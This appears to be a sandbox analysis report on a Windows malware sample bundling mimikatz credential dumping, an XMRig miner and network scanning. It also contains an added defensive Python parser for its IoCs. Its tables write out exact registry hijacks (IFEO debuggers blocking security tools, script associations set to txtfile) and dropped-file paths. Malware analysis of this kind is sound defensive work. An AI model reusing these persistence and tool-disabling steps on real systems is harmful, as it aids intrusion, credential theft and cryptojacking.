Analysis
max time kernel: 150s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted: 24-12-2024 12:54

Behavioral task: behavioral1
Sample: 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe
Resource: win10v2004-20241007-en

General
Target: 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe
Size: 9.9MB
MD5: 95fce9e61d3584e0f6e908b4fad47f63
SHA1: 26071cb21930728be85770192502253627a27939
SHA256: 16e7c4931abda279940e40aefa791792814db31d7036410d5ed27ed39dcf03e6
SHA512: e17d102d4fc936394c0d8d684b916c814f610c7f1d4102904c55417b8fe35bbdf8f9ced44209e51b5d2cd66f44de6cd6356e2eb3a099699c4121aed4606c8490
SSDEEP: 196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

Mimikatz
mimikatz is an open source tool to dump credentials on Windows.

Mimikatz family

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 2696 created 2044 | 2696 | zyejeil.exe | 37

Xmrig family

Contacts a large (30613) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.

OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.

XMRig Miner payload 12 IoCs
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Drops file in Drivers directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | zyejeil.exe
File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
File created | C:\Windows\system32\drivers\etc\hosts | zyejeil.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | zyejeil.exe

Modifies Windows Firewall 2 TTPs 2 IoCs
pid | Process
5000 | netsh.exe
2616 | netsh.exe

Executes dropped EXE 28 IoCs
pid | Process
4880 | zyejeil.exe
2696 | zyejeil.exe
4856 | wpcap.exe
2156 | zqkkhilub.exe
2968 | vfshost.exe
4792 | ucqzmelym.exe
964 | xohudmc.exe
904 | joxnkm.exe
4972 | ejzklm.exe
2312 | ucqzmelym.exe
448 | ucqzmelym.exe
4900 | ucqzmelym.exe
1616 | ucqzmelym.exe
4956 | ucqzmelym.exe
3104 | ucqzmelym.exe
3736 | ucqzmelym.exe
1360 | ucqzmelym.exe
1040 | ucqzmelym.exe
4792 | ucqzmelym.exe
776 | ucqzmelym.exe
3176 | ucqzmelym.exe
4156 | ucqzmelym.exe
2176 | ucqzmelym.exe
3800 | ucqzmelym.exe
2820 | ucqzmelym.exe
2372 | zyejeil.exe
4260 | nusubcedp.exe
4796 | zyejeil.exe

Loads dropped DLL 12 IoCs
pid | Process
4856 | wpcap.exe
4856 | wpcap.exe
4856 | wpcap.exe
4856 | wpcap.exe
4856 | wpcap.exe
4856 | wpcap.exe
4856 | wpcap.exe
4856 | wpcap.exe
4856 | wpcap.exe
2156 | zqkkhilub.exe
2156 | zqkkhilub.exe
2156 | zqkkhilub.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
67 | ifconfig.me
68 | ifconfig.me

Creates a Windows Service

Drops file in System32 directory 18 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\wpcap.dll | wpcap.exe
File created | C:\Windows\SysWOW64\Packet.dll | wpcap.exe
File created | C:\Windows\system32\wpcap.dll | wpcap.exe
File created | C:\Windows\SysWOW64\joxnkm.exe | xohudmc.exe
File created | C:\Windows\SysWOW64\pthreadVC.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | zyejeil.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | zyejeil.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | zyejeil.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | zyejeil.exe
File created | C:\Windows\system32\Packet.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\joxnkm.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | zyejeil.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | zyejeil.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | zyejeil.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | zyejeil.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | zyejeil.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 | zyejeil.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 | zyejeil.exe

Drops file in Program Files directory 3 IoCs
description | ioc | Process
File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe

Drops file in Windows directory 60 IoCs
description | ioc | Process
File created | C:\Windows\lrcwzntnt\UnattendGC\vimpcsvc.xml | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\docmicfg.xml | zyejeil.exe
File opened for modification | C:\Windows\lrcwzntnt\Corporate\log.txt | cmd.exe
File opened for modification | C:\Windows\uzepkltb\spoolsrv.xml | zyejeil.exe
File created | C:\Windows\lrcwzntnt\bmkbibntg\scan.bat | zyejeil.exe
File opened for modification | C:\Windows\lrcwzntnt\bmkbibntg\Packet.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\svschost.xml | zyejeil.exe
File created | C:\Windows\uzepkltb\schoedcl.xml | zyejeil.exe
File created | C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe | zyejeil.exe
File created | C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe | zyejeil.exe
File created | C:\Windows\lrcwzntnt\bmkbibntg\nusubcedp.exe | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\svschost.exe | zyejeil.exe
File created | C:\Windows\lrcwzntnt\Corporate\mimidrv.sys | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\xdvl-0.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\Corporate\mimilib.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\upbdrjv\swrpwe.exe | zyejeil.exe
File created | C:\Windows\uzepkltb\zyejeil.exe | 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\libeay32.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\schoedcl.xml | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\schoedcl.xml | zyejeil.exe
File created | C:\Windows\uzepkltb\vimpcsvc.xml | zyejeil.exe
File created | C:\Windows\ime\zyejeil.exe | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\docmicfg.xml | zyejeil.exe
File opened for modification | C:\Windows\uzepkltb\svschost.xml | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\crli-0.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\exma-1.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\tucl-1.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\zlib1.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\spoolsrv.exe | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\spoolsrv.xml | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\coli-0.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\ssleay32.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\trch-1.dll | zyejeil.exe
File opened for modification | C:\Windows\uzepkltb\schoedcl.xml | zyejeil.exe
File opened for modification | C:\Windows\lrcwzntnt\bmkbibntg\Result.txt | nusubcedp.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\trfo-2.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\vimpcsvc.exe | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\spoolsrv.xml | zyejeil.exe
File created | C:\Windows\uzepkltb\spoolsrv.xml | zyejeil.exe
File created | C:\Windows\lrcwzntnt\Corporate\vfshost.exe | zyejeil.exe
File created | C:\Windows\uzepkltb\docmicfg.xml | zyejeil.exe
File opened for modification | C:\Windows\uzepkltb\vimpcsvc.xml | zyejeil.exe
File opened for modification | C:\Windows\uzepkltb\docmicfg.xml | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\AppCapture64.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\cnli-1.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\tibe-2.dll | zyejeil.exe
File opened for modification | C:\Windows\uzepkltb\zyejeil.exe | 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe
File created | C:\Windows\lrcwzntnt\bmkbibntg\Packet.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\vimpcsvc.xml | zyejeil.exe
File created | C:\Windows\uzepkltb\svschost.xml | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\Shellcode.ini | zyejeil.exe
File created | C:\Windows\lrcwzntnt\bmkbibntg\ip.txt | zyejeil.exe
File created | C:\Windows\lrcwzntnt\bmkbibntg\wpcap.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\docmicfg.exe | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\svschost.xml | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\AppCapture32.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\libxml2.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\posh-0.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\ucl.dll | zyejeil.exe
File created | C:\Windows\lrcwzntnt\UnattendGC\specials\schoedcl.exe | zyejeil.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
2936 | sc.exe
3720 | sc.exe
3248 | sc.exe
3012 | sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
4256 | cmd.exe
492 | PING.EXE

NSIS installer 3 IoCs
resource | yara_rule
behavioral2/files/0x000b000000023b79-6.dat | nsis_installer_2
behavioral2/files/0x000b000000023b94-15.dat | nsis_installer_1
behavioral2/files/0x000b000000023b94-15.dat | nsis_installer_2

Modifies data under HKEY_USERS 43 IoCs
description ioc Process
Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe (×17)
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe (×17)
Key created \REGISTRY\USER\.DEFAULT\Software ucqzmelym.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals ucqzmelym.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ucqzmelym.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zyejeil.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zyejeil.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" zyejeil.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zyejeil.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zyejeil.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" zyejeil.exe
-
Modifies registry class 14 IoCs
description ioc Process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zyejeil.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zyejeil.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zyejeil.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zyejeil.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zyejeil.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zyejeil.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zyejeil.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zyejeil.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zyejeil.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zyejeil.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zyejeil.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zyejeil.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zyejeil.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zyejeil.exe
-
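What the two registry sections above amount to, as an added example that is not part of the sandbox report: the parser below reads IoC lines in the format printed here, flags every script extension whose (Default) ProgID under HKLM\SOFTWARE\Classes was redirected to txtfile (the Notepad ProgID), and lists which processes wrote under HKEY_USERS\.DEFAULT, the hive HKEY_CURRENT_USER resolves to for a process running as LocalSystem. The baseline ProgIDs are the stock Windows 10 values and are an assumption of the example; the sample lines are constructed from the entries above.

```python
import re

# IoC lines in the format this report prints (constructed sample: a subset of the
# entries in the two registry sections above).
SAMPLE_IOCS = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zyejeil.exe',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zyejeil.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zyejeil.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zyejeil.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zyejeil.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zyejeil.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zyejeil.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zyejeil.exe',
    r'Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe',
    r'Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zyejeil.exe',
    r'Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zyejeil.exe',
]

# Paths may contain spaces ("Internet Settings"), so the path is matched non-greedily
# up to the ' = "' separator (set) or the final process name (create).
SET_VALUE_RE = re.compile(r'^Set value \((\w+)\) (\\REGISTRY\\.+?) = "(.*?)" (\S+)$')
KEY_CREATED_RE = re.compile(r'^Key created (\\REGISTRY\\.+?) (\S+)$')

# Stock Windows 10 (Default) ProgIDs for the extensions the sample rewrote (assumed baseline).
EXPECTED_PROGID = {
    ".bat": "batfile", ".cmd": "cmdfile", ".vbs": "VBSFile", ".vbe": "VBEFile",
    ".js": "JSFile", ".reg": "regfile", ".ps1": "Microsoft.PowerShellScript.1",
}
CLASSES_PREFIX = "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\."
DEFAULT_HIVE = "\\REGISTRY\\USER\\.DEFAULT\\"   # HKCU of a LocalSystem process


def parse_ioc(line):
    """One 'Set value ...' or 'Key created ...' line as a dict, or None if it is neither."""
    m = SET_VALUE_RE.match(line)
    if m:
        return {"op": "set", "type": m.group(1), "path": m.group(2),
                "data": m.group(3), "process": m.group(4)}
    m = KEY_CREATED_RE.match(line)
    if m:
        return {"op": "create", "path": m.group(1), "process": m.group(2)}
    return None


def parse_report(lines):
    return [ioc for ioc in map(parse_ioc, lines) if ioc is not None]


def association_hijacks(iocs):
    """{ext: (written ProgID, expected ProgID, writer)} for every Classes\\.<ext> (Default)
    rewrite. Key names are case-insensitive, so the report's .VBE and .vbe are one key."""
    hits = {}
    for ioc in iocs:
        path = ioc["path"]
        if (ioc["op"] != "set" or not path.lower().startswith(CLASSES_PREFIX.lower())
                or not path.endswith("\\")):
            continue
        ext = "." + path[len(CLASSES_PREFIX):-1].lower()  # trailing backslash = (Default) value
        expected = EXPECTED_PROGID.get(ext)
        if expected is not None and ioc["data"] != expected:
            hits[ext] = (ioc["data"], expected, ioc["process"])
    return hits


def system_context_writers(iocs):
    """Processes that wrote under HKEY_USERS\\.DEFAULT, i.e. were running as LocalSystem."""
    return sorted({ioc["process"] for ioc in iocs
                   if ioc["path"].lower().startswith(DEFAULT_HIVE.lower())})


if __name__ == "__main__":
    iocs = parse_report(SAMPLE_IOCS)
    for ext, (got, want, proc) in sorted(association_hijacks(iocs).items()):
        print(f"{ext}: {want} -> {got} (written by {proc})")
    print("LocalSystem-context writers:", system_context_writers(iocs))
```

Pointing .bat, .cmd, .vbs, .vbe, .js and .reg at txtfile means a double-clicked script opens in Notepad instead of running, and wscript/cscript resolve the script engine through the same ProgID, so .vbs and .js fail there as well; cmd /c still runs batch files directly. The .ps1 rewrite changes nothing visible, since .ps1 already opens in Notepad by default. The ProcDump EulaAccepted value under .DEFAULT is the trace of the renamed ProcDump (ucqzmelym.exe) being run with -accepteula as SYSTEM.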
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 492 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
5060 schtasks.exe
4092 schtasks.exe
4260 schtasks.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process
2696 zyejeil.exe (×64)
-
Suspicious behavior: LoadsDriver 15 IoCs
pid Process
664 Process not Found (×15)
-
Suspicious behavior: RenamesItself 1 IoCs
pid Process 208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process
Token: SeDebugPrivilege 208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege 4880 zyejeil.exe
Token: SeDebugPrivilege 2696 zyejeil.exe
Token: SeDebugPrivilege 2968 vfshost.exe
Token: SeDebugPrivilege 4792 ucqzmelym.exe
Token: SeLockMemoryPrivilege 4972 ejzklm.exe (×2)
Token: SeDebugPrivilege 2312 ucqzmelym.exe
Token: SeDebugPrivilege 448 ucqzmelym.exe
Token: SeDebugPrivilege 4900 ucqzmelym.exe
Token: SeDebugPrivilege 1616 ucqzmelym.exe
Token: SeDebugPrivilege 4956 ucqzmelym.exe
Token: SeDebugPrivilege 3104 ucqzmelym.exe
Token: SeDebugPrivilege 3736 ucqzmelym.exe
Token: SeDebugPrivilege 1360 ucqzmelym.exe
Token: SeDebugPrivilege 1040 ucqzmelym.exe
Token: SeDebugPrivilege 4792 ucqzmelym.exe
Token: SeDebugPrivilege 776 ucqzmelym.exe
Token: SeDebugPrivilege 3176 ucqzmelym.exe
Token: SeDebugPrivilege 4156 ucqzmelym.exe
Token: SeDebugPrivilege 2176 ucqzmelym.exe
Token: SeDebugPrivilege 3800 ucqzmelym.exe
Token: SeDebugPrivilege 2820 ucqzmelym.exe
-
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process
208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe (×2)
4880 zyejeil.exe (×2)
2696 zyejeil.exe (×2)
964 xohudmc.exe
904 joxnkm.exe
2372 zyejeil.exe (×2)
4796 zyejeil.exe (×2)
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 208 wrote to memory of 4256 208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe 83 (×3)
PID 4256 wrote to memory of 492 4256 cmd.exe 85 (×3)
PID 4256 wrote to memory of 4880 4256 cmd.exe 87 (×3)
PID 2696 wrote to memory of 1484 2696 zyejeil.exe 89 (×3)
PID 1484 wrote to memory of 3728 1484 cmd.exe 91 (×3)
PID 1484 wrote to memory of 4528 1484 cmd.exe 92 (×3)
PID 1484 wrote to memory of 3252 1484 cmd.exe 93 (×3)
PID 1484 wrote to memory of 3800 1484 cmd.exe 94 (×3)
